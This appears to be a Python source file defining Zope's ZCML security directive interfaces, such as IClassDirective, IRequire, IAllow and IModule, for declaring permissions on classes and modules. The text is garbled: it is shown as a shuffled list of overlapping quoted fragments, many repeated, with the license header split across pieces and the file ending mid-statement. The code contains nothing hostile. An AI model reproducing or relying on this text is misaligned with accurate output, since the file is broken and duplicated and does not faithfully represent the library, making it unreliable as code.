'class' attribute.\"\"\"), required=False, ) title = zope.configuration.fields.MessageID(", "to access or mutate the attributes and methods specified.\"\"\"), required=False, ) attributes =", "############################################################################## # # Copyright (c) 2001, 2002 Zope Foundation and Contributors. # All", "more interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface() ) class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that the a specified list", "directive's 'class' attribute.\"\"\"), required=False, ) title = zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text suitable for use", "TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. # ##############################################################################", "interface\"), required=False, ) description = zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer narrative description of what this\"", "zope.interface import zope.schema from zope.interface import Interface import zope.security.zcml from zope.security.i18n import ZopeMessageFactory", "access. \"\"\" permission = zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\" Specifies the permission by id that", "required=True) class IAllow(Interface): \"\"\"Allow access to selected module attributes Access is unconditionally allowed", "IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED #", "provided directly in the attributes attribute or any names defined by interfaces listed", "by interfaces listed in the interface attribute. \"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The", "title=_(\"Class\"), required=True ) class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that the class given by the content", "to any names provided directly in the attributes attribute or to any names", "a given Interface require a given permission for access. \"\"\" permission = zope.security.zcml.Permission(", "can be set\"), description=_(\"This is a list of attributes that can be\" \"", "the literal string given as the content directive's 'class' attribute.\"\"\"), required=False, ) title", ") interface = zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The listed interfaces' methods and attributes\" \" can", "# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR", "provisions of the Zope Public License, # Version 2.1 (ZPL). A copy of", "that can be set\"), description=_(\"This is a list of attributes that can be\"", "IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A", "title=_(\"Interfaces\"), description=_(\"The listed interfaces' methods and attributes\" \" can be accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(),", "this class\"), description=_(\"\"\" This argument says that this content class should be configured", "Tokens( title=u\"Attributes\", description=u\"The attributes to provide access to.\", value_type=PythonIdentifier(), required=False) interface = Tokens(", "This software is subject to the provisions of the Zope Public License, #", "to provide access to.\", value_type=PythonIdentifier(), required=False) interface = Tokens( title=u\"Interface\", description=(u\"Interfaces whos names", "and methods specified.\"\"\"), required=False, ) attributes = zope.configuration.fields.Tokens( title=_(\"Attributes and methods\"), description=_(\"This is", "names provided directly in the attributes attribute or to any names defined by", "IClassDirective(zope.interface.Interface): \"\"\"Make statements about a class\"\"\" class_ = zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True ) class", "methods\"), description=_(\"This is a list of attributes and methods\" \" that can be", "the attributes and methods specified.\"\"\"), required=False, ) attributes = zope.configuration.fields.Tokens( title=_(\"Attributes and methods\"),", "be accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes = zope.configuration.fields.Tokens( title=_(\"Attributes that can be set\"),", "schemas' properties can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) like_class = zope.configuration.fields.GlobalObject( title=_(\"Configure", "attribute or to any names defined by interfaces listed in the interface attribute.", "attributes The given permission is required to access any names provided directly in", "class attribute implements a given interface \"\"\" interface = zope.configuration.fields.Tokens( title=_(\"One or more", "title=_(\"Attributes and methods\"), description=_(\"This is a list of attributes and methods\" \" that", "Tokens( title=u\"Interface\", description=(u\"Interfaces whos names to provide access to. Access \" u\"will be", "title = zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text suitable for use in the 'add content' menu\"", "MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. # ############################################################################## \"\"\"Component", "methods specified.\"\"\"), required=False, ) attributes = zope.configuration.fields.Tokens( title=_(\"Attributes and methods\"), description=_(\"This is a", "IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the factory used to create this content object\"\"\" id = zope.schema.Id(", "attributes attribute or any names defined by interfaces listed in the interface attribute.", "permission by id that will be required to access or mutate the attributes", "\" modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) like_class = zope.configuration.fields.GlobalObject( title=_(\"Configure like this class\"), description=_(\"\"\"", "will be required to access or mutate the attributes and methods specified.\"\"\"), required=False,", "to be publicly viewable (that is, requires the zope.Public permission). Only one of", "the zope.Public permission). Only one of the following two attributes may be used.", "zope.Public permission). Only one of the following two attributes may be used. \"\"\"", "_ from zope.security.zcml import Permission class IClassDirective(zope.interface.Interface): \"\"\"Make statements about a class\"\"\" class_", "the 'add content' menu\" \" of a management interface\"), required=False, ) description =", "of the Zope Public License, # Version 2.1 (ZPL). A copy of the", "import zope.schema from zope.interface import Interface import zope.security.zcml from zope.security.i18n import ZopeMessageFactory as", "the schema can be set\"), description=_(\"The listed schemas' properties can be\" \" modified/mutated.\"),", "\"\"\"Specify the factory used to create this content object\"\"\" id = zope.schema.Id( title=_(\"ID\"),", "require permission for.\", value_type=PythonIdentifier(), required=False) permission = Permission( title=u\"Permission ID\", description=u\"The ID of", "the names defined by the \" u\"interface(s). Multiple interfaces can be supplied.\"), value_type=GlobalInterface(),", "EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE", "viewable (that is, requires the zope.Public permission). Only one of the following two", "can be set\"), description=_(\"The listed schemas' properties can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(),", "All Rights Reserved. # # This software is subject to the provisions of", ") title = zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text suitable for use in the 'add content'", "class_ = zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True ) class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that the class given", "'class' attribute.\"\"\"), required=False, ) title = zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text suitable for use in", "of a management interface\"), required=False, ) description = zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer narrative description", "If not given, defaults to the literal string given as the content directive's", "can be accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes = zope.configuration.fields.Tokens( title=_(\"Attributes that can be", "directly in the attributes attribute or to any names defined by interfaces listed", "zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The listed interfaces' methods and attributes\" \" can be accessed.\"), required=False,", ") attributes = zope.configuration.fields.Tokens( title=_(\"Attributes and methods\"), description=_(\"This is a list of attributes", "specified list of names or the names in a given Interface require a", "attributes and methods\" \" that can be accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes =", "be used.\"\"\"), required=False, ) class IAllowSubdirective(zope.interface.Interface): \"\"\" Declare a part of the class", "this content object\"\"\" id = zope.schema.Id( title=_(\"ID\"), description=_(\"\"\" the identifier for this factory", "the class given by the content directive's class attribute implements a given interface", "zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer narrative description of what this\" \" factory does\"), required=False, )", "required=False, ) class IAllowSubdirective(zope.interface.Interface): \"\"\" Declare a part of the class to be", "Multiple interfaces can be supplied.\"), value_type=GlobalInterface(), required=False) class IRequire(Interface): \"\"\"Require a permission to", "for.\", value_type=PythonIdentifier(), required=False) permission = Permission( title=u\"Permission ID\", description=u\"The ID of the permission", ") set_schema = zope.configuration.fields.Tokens( title=_(\"The attributes specified by the schema can be set\"),", "the module object.\", required=True) class IAllow(Interface): \"\"\"Allow access to selected module attributes Access", "IRequire(Interface): \"\"\"Require a permission to access selected module attributes The given permission is", "provided directly in the attributes attribute or to any names defined by interfaces", "description=_(\"Longer narrative description of what this\" \" factory does\"), required=False, ) class IModule(Interface):", "2001, 2002 Zope Foundation and Contributors. # All Rights Reserved. # # This", "module object.\", required=True) class IAllow(Interface): \"\"\"Allow access to selected module attributes Access is", "interface attribute. \"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to require permission for.\",", "this distribution. # THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL", "= zope.configuration.fields.Tokens( title=_(\"Attributes that can be set\"), description=_(\"This is a list of attributes", "IAllow(Interface): \"\"\"Allow access to selected module attributes Access is unconditionally allowed to any", "a permission to access selected module attributes The given permission is required to", ") description = zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer narrative description of what this\" \" factory", "attributes and methods specified.\"\"\"), required=False, ) attributes = zope.configuration.fields.Tokens( title=_(\"Attributes and methods\"), description=_(\"This", "attributes specified by the schema can be set\"), description=_(\"The listed schemas' properties can", "title=u\"Attributes\", description=u\"The attributes to provide access to.\", value_type=PythonIdentifier(), required=False) interface = Tokens( title=u\"Interface\",", "\"\"\"Require a permission to access selected module attributes The given permission is required", "required=False, value_type=zope.configuration.fields.GlobalInterface(), ) set_schema = zope.configuration.fields.Tokens( title=_(\"The attributes specified by the schema can", "description=_(\"The listed schemas' properties can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) like_class =", "\" that can be accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes = zope.configuration.fields.Tokens( title=_(\"Attributes that", "should accompany this distribution. # THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY", "a specified list of names or the names in a given Interface require", "zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text suitable for use in the 'add content' menu\" \" of", "factory in the ZMI factory identification scheme. If not given, defaults to the", "OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED", "= zope.configuration.fields.Tokens( title=_(\"The attributes specified by the schema can be set\"), description=_(\"The listed", ") like_class = zope.configuration.fields.GlobalObject( title=_(\"Configure like this class\"), description=_(\"\"\" This argument says that", "for access. \"\"\" permission = zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\" Specifies the permission by id", "module attributes Access is unconditionally allowed to any names provided directly in the", "the ZMI factory identification scheme. If not given, defaults to the literal string", "import zope.security.zcml from zope.security.i18n import ZopeMessageFactory as _ from zope.security.zcml import Permission class", "given permission for access. \"\"\" permission = zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\" Specifies the permission", "interfaces listed in the interface attribute. \"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes", "IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that the a specified list of names or the names in", "Permission class IClassDirective(zope.interface.Interface): \"\"\"Make statements about a class\"\"\" class_ = zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True", "says that this content class should be configured in the same way the", "specified.\"\"\"), required=False, ) attributes = zope.configuration.fields.Tokens( title=_(\"Attributes and methods\"), description=_(\"This is a list", "may be used. \"\"\" attributes = zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface =", "permission is required to access any names provided directly in the attributes attribute", "'restructuredtext' import zope.configuration.fields from zope.configuration.fields import GlobalObject, GlobalInterface from zope.configuration.fields import Tokens, PythonIdentifier", "IAllowSubdirective(zope.interface.Interface): \"\"\" Declare a part of the class to be publicly viewable (that", "interface = zope.configuration.fields.Tokens( title=_(\"One or more interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface() ) class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate", "TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS #", "a given interface \"\"\" interface = zope.configuration.fields.Tokens( title=_(\"One or more interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface()", "module attributes The given permission is required to access any names provided directly", "given Interface require a given permission for access. \"\"\" permission = zope.security.zcml.Permission( title=_(\"Permission\"),", "provide access to. Access \" u\"will be provided to all of the names", "of the following two attributes may be used. \"\"\" attributes = zope.configuration.fields.Tokens( title=_(\"Attributes\"),", "class IAllowSubdirective(zope.interface.Interface): \"\"\" Declare a part of the class to be publicly viewable", "class\"), description=_(\"\"\" This argument says that this content class should be configured in", "in the interface attribute. \"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to require", "title=_(\"Configure like this class\"), description=_(\"\"\" This argument says that this content class should", "DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY,", "set_schema = zope.configuration.fields.Tokens( title=_(\"The attributes specified by the schema can be set\"), description=_(\"The", "WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE.", "create this content object\"\"\" id = zope.schema.Id( title=_(\"ID\"), description=_(\"\"\" the identifier for this", "is specified, no other argument can be used.\"\"\"), required=False, ) class IAllowSubdirective(zope.interface.Interface): \"\"\"", "Copyright (c) 2001, 2002 Zope Foundation and Contributors. # All Rights Reserved. #", "AND FITNESS # FOR A PARTICULAR PURPOSE. # ############################################################################## \"\"\"Component architecture related 'zope'", "is a list of attributes that can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), )", "zope.configuration.fields.GlobalObject( title=_(\"Configure like this class\"), description=_(\"\"\" This argument says that this content class", "a list of attributes that can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface", "\" u\"will be provided to all of the names defined by the \"", "the a specified list of names or the names in a given Interface", "factory used to create this content object\"\"\" id = zope.schema.Id( title=_(\"ID\"), description=_(\"\"\" the", "to the module object.\", required=True) class IAllow(Interface): \"\"\"Allow access to selected module attributes", "zope.configuration.fields.Tokens( title=_(\"One or more interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface() ) class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that the", "# FOR A PARTICULAR PURPOSE. # ############################################################################## \"\"\"Component architecture related 'zope' ZCML namespace", "IModule(Interface): \"\"\"Group security declarations about a module\"\"\" module = GlobalObject( title=u\"Module\", description=u\"Pointer to", "is unconditionally allowed to any names provided directly in the attributes attribute or", "class should be configured in the same way the specified class' security is.", "(ZPL). A copy of the ZPL should accompany this distribution. # THIS SOFTWARE", "to create this content object\"\"\" id = zope.schema.Id( title=_(\"ID\"), description=_(\"\"\" the identifier for", "zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True ) class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that the class given by the", "= Tokens( title=u\"Attributes\", description=u\"The attributes to provide access to.\", value_type=PythonIdentifier(), required=False) interface =", "in the 'add content' menu\" \" of a management interface\"), required=False, ) description", ") interface = zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the factory", "class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the factory used to create this content object\"\"\" id =", "Zope Public License, # Version 2.1 (ZPL). A copy of the ZPL should", "attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to require permission for.\", value_type=PythonIdentifier(), required=False) permission", "ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT", "A PARTICULAR PURPOSE. # ############################################################################## \"\"\"Component architecture related 'zope' ZCML namespace directive interfaces", "provided to all of the names defined by the \" u\"interface(s). Multiple interfaces", "and methods\" \" that can be accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes = zope.configuration.fields.Tokens(", "title=_(\"Description\"), description=_(\"Longer narrative description of what this\" \" factory does\"), required=False, ) class", "# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR", "by the schema can be set\"), description=_(\"The listed schemas' properties can be\" \"", "2002 Zope Foundation and Contributors. # All Rights Reserved. # # This software", "attributes may be used. \"\"\" attributes = zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface", "\" modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The listed interfaces' methods", "module\"\"\" module = GlobalObject( title=u\"Module\", description=u\"Pointer to the module object.\", required=True) class IAllow(Interface):", "\"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to require permission for.\", value_type=PythonIdentifier(), required=False)", "a module\"\"\" module = GlobalObject( title=u\"Module\", description=u\"Pointer to the module object.\", required=True) class", "Foundation and Contributors. # All Rights Reserved. # # This software is subject", "subject to the provisions of the Zope Public License, # Version 2.1 (ZPL).", "what this\" \" factory does\"), required=False, ) class IModule(Interface): \"\"\"Group security declarations about", "or any names defined by interfaces listed in the interface attribute. \"\"\" attributes", "or the names in a given Interface require a given permission for access.", "interface = zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The listed interfaces' methods and attributes\" \" can be", "accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) set_schema = zope.configuration.fields.Tokens( title=_(\"The attributes specified by the schema", "title=_(\"One or more interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface() ) class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that the a", "content class should be configured in the same way the specified class' security", "that will be required to access or mutate the attributes and methods specified.\"\"\"),", "the Zope Public License, # Version 2.1 (ZPL). A copy of the ZPL", "# Copyright (c) 2001, 2002 Zope Foundation and Contributors. # All Rights Reserved.", "PARTICULAR PURPOSE. # ############################################################################## \"\"\"Component architecture related 'zope' ZCML namespace directive interfaces \"\"\"", "INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. # ############################################################################## \"\"\"Component architecture related", "the specified class' security is. If this argument is specified, no other argument", "A copy of the ZPL should accompany this distribution. # THIS SOFTWARE IS", "attributes = zope.configuration.fields.Tokens( title=_(\"Attributes and methods\"), description=_(\"This is a list of attributes and", "used to create this content object\"\"\" id = zope.schema.Id( title=_(\"ID\"), description=_(\"\"\" the identifier", "description=_(\"\"\" Specifies the permission by id that will be required to access or", "access or mutate the attributes and methods specified.\"\"\"), required=False, ) attributes = zope.configuration.fields.Tokens(", "\"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to provide access to.\", value_type=PythonIdentifier(), required=False)", "be accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) set_schema = zope.configuration.fields.Tokens( title=_(\"The attributes specified by the", "the attributes attribute or to any names defined by interfaces listed in the", "names to provide access to. Access \" u\"will be provided to all of", "given permission is required to access any names provided directly in the attributes", "The given permission is required to access any names provided directly in the", "ZPL should accompany this distribution. # THIS SOFTWARE IS PROVIDED \"AS IS\" AND", "and Contributors. # All Rights Reserved. # # This software is subject to", "the following two attributes may be used. \"\"\" attributes = zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False,", "interfaces \"\"\" __docformat__ = 'restructuredtext' import zope.configuration.fields from zope.configuration.fields import GlobalObject, GlobalInterface from", "zope.configuration.fields from zope.configuration.fields import GlobalObject, GlobalInterface from zope.configuration.fields import Tokens, PythonIdentifier import zope.interface", "attribute.\"\"\"), required=False, ) title = zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text suitable for use in the", "selected module attributes Access is unconditionally allowed to any names provided directly in", "can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The listed", "be supplied.\"), value_type=GlobalInterface(), required=False) class IRequire(Interface): \"\"\"Require a permission to access selected module", "declarations about a module\"\"\" module = GlobalObject( title=u\"Module\", description=u\"Pointer to the module object.\",", "in the attributes attribute or any names defined by interfaces listed in the", "allowed to any names provided directly in the attributes attribute or to any", "zope.configuration.fields.Tokens( title=_(\"Attributes that can be set\"), description=_(\"This is a list of attributes that", "given by the content directive's class attribute implements a given interface \"\"\" interface", "namespace directive interfaces \"\"\" __docformat__ = 'restructuredtext' import zope.configuration.fields from zope.configuration.fields import GlobalObject,", "the content directive's class attribute implements a given interface \"\"\" interface = zope.configuration.fields.Tokens(", "defined by interfaces listed in the interface attribute. \"\"\" attributes = Tokens( title=u\"Attributes\",", "access selected module attributes The given permission is required to access any names", "\"\"\"Component architecture related 'zope' ZCML namespace directive interfaces \"\"\" __docformat__ = 'restructuredtext' import", "If this argument is specified, no other argument can be used.\"\"\"), required=False, )", "configured in the same way the specified class' security is. If this argument", "Specifies the permission by id that will be required to access or mutate", "zope.security.zcml import Permission class IClassDirective(zope.interface.Interface): \"\"\"Make statements about a class\"\"\" class_ = zope.configuration.fields.GlobalObject(", "class\"\"\" class_ = zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True ) class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that the class", "attributes Access is unconditionally allowed to any names provided directly in the attributes", "to. Access \" u\"will be provided to all of the names defined by", "u\"interface(s). Multiple interfaces can be supplied.\"), value_type=GlobalInterface(), required=False) class IRequire(Interface): \"\"\"Require a permission", "to all of the names defined by the \" u\"interface(s). Multiple interfaces can", "literal string given as the content directive's 'class' attribute.\"\"\"), required=False, ) title =", "description=_(\"This is a list of attributes that can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(),", "is a list of attributes and methods\" \" that can be accessed.\"), required=False,", "specified class' security is. If this argument is specified, no other argument can", "Declare a part of the class to be publicly viewable (that is, requires", "as the content directive's 'class' attribute.\"\"\"), required=False, ) title = zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text", "IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES", "be set\"), description=_(\"This is a list of attributes that can be\" \" modified/mutated.\"),", "zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\" Specifies the permission by id that will be required to", "any names defined by interfaces listed in the interface attribute. \"\"\" attributes =", "BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT,", "Tokens( title=u\"Attributes\", description=u\"The attributes to require permission for.\", value_type=PythonIdentifier(), required=False) permission = Permission(", "<reponame>manliu1225/Facebook_crawler ############################################################################## # # Copyright (c) 2001, 2002 Zope Foundation and Contributors. #", "and attributes\" \" can be accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) set_schema = zope.configuration.fields.Tokens( title=_(\"The", "############################################################################## \"\"\"Component architecture related 'zope' ZCML namespace directive interfaces \"\"\" __docformat__ = 'restructuredtext'", "= zope.configuration.fields.Tokens( title=_(\"One or more interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface() ) class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that", "following two attributes may be used. \"\"\" attributes = zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(),", "required=False, value_type=zope.configuration.fields.GlobalInterface(), ) class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the factory used to create this content", "supplied.\"), value_type=GlobalInterface(), required=False) class IRequire(Interface): \"\"\"Require a permission to access selected module attributes", "copy of the ZPL should accompany this distribution. # THIS SOFTWARE IS PROVIDED", "by the \" u\"interface(s). Multiple interfaces can be supplied.\"), value_type=GlobalInterface(), required=False) class IRequire(Interface):", "attribute. \"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to require permission for.\", value_type=PythonIdentifier(),", "to require permission for.\", value_type=PythonIdentifier(), required=False) permission = Permission( title=u\"Permission ID\", description=u\"The ID", "is, requires the zope.Public permission). Only one of the following two attributes may", "names in a given Interface require a given permission for access. \"\"\" permission", "required to access any names provided directly in the attributes attribute or any", "ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO,", "ZopeMessageFactory as _ from zope.security.zcml import Permission class IClassDirective(zope.interface.Interface): \"\"\"Make statements about a", "mutate the attributes and methods specified.\"\"\"), required=False, ) attributes = zope.configuration.fields.Tokens( title=_(\"Attributes and", "attribute implements a given interface \"\"\" interface = zope.configuration.fields.Tokens( title=_(\"One or more interfaces\"),", "schema can be set\"), description=_(\"The listed schemas' properties can be\" \" modified/mutated.\"), required=False,", "no other argument can be used.\"\"\"), required=False, ) class IAllowSubdirective(zope.interface.Interface): \"\"\" Declare a", "Zope Foundation and Contributors. # All Rights Reserved. # # This software is", "argument can be used.\"\"\"), required=False, ) class IAllowSubdirective(zope.interface.Interface): \"\"\" Declare a part of", "interface attribute. \"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to provide access to.\",", "attributes to require permission for.\", value_type=PythonIdentifier(), required=False) permission = Permission( title=u\"Permission ID\", description=u\"The", "ZCML namespace directive interfaces \"\"\" __docformat__ = 'restructuredtext' import zope.configuration.fields from zope.configuration.fields import", "from zope.configuration.fields import GlobalObject, GlobalInterface from zope.configuration.fields import Tokens, PythonIdentifier import zope.interface import", "# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES", "distribution. # THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS", "narrative description of what this\" \" factory does\"), required=False, ) class IModule(Interface): \"\"\"Group", "use in the 'add content' menu\" \" of a management interface\"), required=False, )", "all of the names defined by the \" u\"interface(s). Multiple interfaces can be", "permission for.\", value_type=PythonIdentifier(), required=False) permission = Permission( title=u\"Permission ID\", description=u\"The ID of the", "Reserved. # # This software is subject to the provisions of the Zope", "Tokens, PythonIdentifier import zope.interface import zope.schema from zope.interface import Interface import zope.security.zcml from", "description=u\"The attributes to provide access to.\", value_type=PythonIdentifier(), required=False) interface = Tokens( title=u\"Interface\", description=(u\"Interfaces", "part of the class to be publicly viewable (that is, requires the zope.Public", "class IClassDirective(zope.interface.Interface): \"\"\"Make statements about a class\"\"\" class_ = zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True )", "list of names or the names in a given Interface require a given", "description=_(\"\"\" the identifier for this factory in the ZMI factory identification scheme. If", "the identifier for this factory in the ZMI factory identification scheme. If not", "or to any names defined by interfaces listed in the interface attribute. \"\"\"", "in the same way the specified class' security is. If this argument is", "of names or the names in a given Interface require a given permission", "description=u\"Pointer to the module object.\", required=True) class IAllow(Interface): \"\"\"Allow access to selected module", "class to be publicly viewable (that is, requires the zope.Public permission). Only one", "zope.schema.Id( title=_(\"ID\"), description=_(\"\"\" the identifier for this factory in the ZMI factory identification", "required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The listed interfaces' methods and attributes\"", "GlobalObject( title=u\"Module\", description=u\"Pointer to the module object.\", required=True) class IAllow(Interface): \"\"\"Allow access to", "Access is unconditionally allowed to any names provided directly in the attributes attribute", "class IModule(Interface): \"\"\"Group security declarations about a module\"\"\" module = GlobalObject( title=u\"Module\", description=u\"Pointer", "\" u\"interface(s). Multiple interfaces can be supplied.\"), value_type=GlobalInterface(), required=False) class IRequire(Interface): \"\"\"Require a", "object.\", required=True) class IAllow(Interface): \"\"\"Allow access to selected module attributes Access is unconditionally", "defined by the \" u\"interface(s). Multiple interfaces can be supplied.\"), value_type=GlobalInterface(), required=False) class", "\"\"\" interface = zope.configuration.fields.Tokens( title=_(\"One or more interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface() ) class IRequireSubdirective(zope.interface.Interface):", "to any names defined by interfaces listed in the interface attribute. \"\"\" attributes", "required=False, ) class IModule(Interface): \"\"\"Group security declarations about a module\"\"\" module = GlobalObject(", "(c) 2001, 2002 Zope Foundation and Contributors. # All Rights Reserved. # #", "interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface() ) class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that the a specified list of", "AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. # ############################################################################## \"\"\"Component architecture", "about a class\"\"\" class_ = zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True ) class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that", "required=False, value_type=zope.configuration.fields.GlobalInterface(), ) like_class = zope.configuration.fields.GlobalObject( title=_(\"Configure like this class\"), description=_(\"\"\" This argument", "of the ZPL should accompany this distribution. # THIS SOFTWARE IS PROVIDED \"AS", "Only one of the following two attributes may be used. \"\"\" attributes =", "required=False, ) attributes = zope.configuration.fields.Tokens( title=_(\"Attributes and methods\"), description=_(\"This is a list of", "id = zope.schema.Id( title=_(\"ID\"), description=_(\"\"\" the identifier for this factory in the ZMI", "= GlobalObject( title=u\"Module\", description=u\"Pointer to the module object.\", required=True) class IAllow(Interface): \"\"\"Allow access", "require a given permission for access. \"\"\" permission = zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\" Specifies", "description=_(\"\"\" This argument says that this content class should be configured in the", "zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the factory used to create", "= zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The listed interfaces' methods and attributes\" \" can be accessed.\"),", ") class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the factory used to create this content object\"\"\" id", "__docformat__ = 'restructuredtext' import zope.configuration.fields from zope.configuration.fields import GlobalObject, GlobalInterface from zope.configuration.fields import", "a management interface\"), required=False, ) description = zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer narrative description of", "be used. \"\"\" attributes = 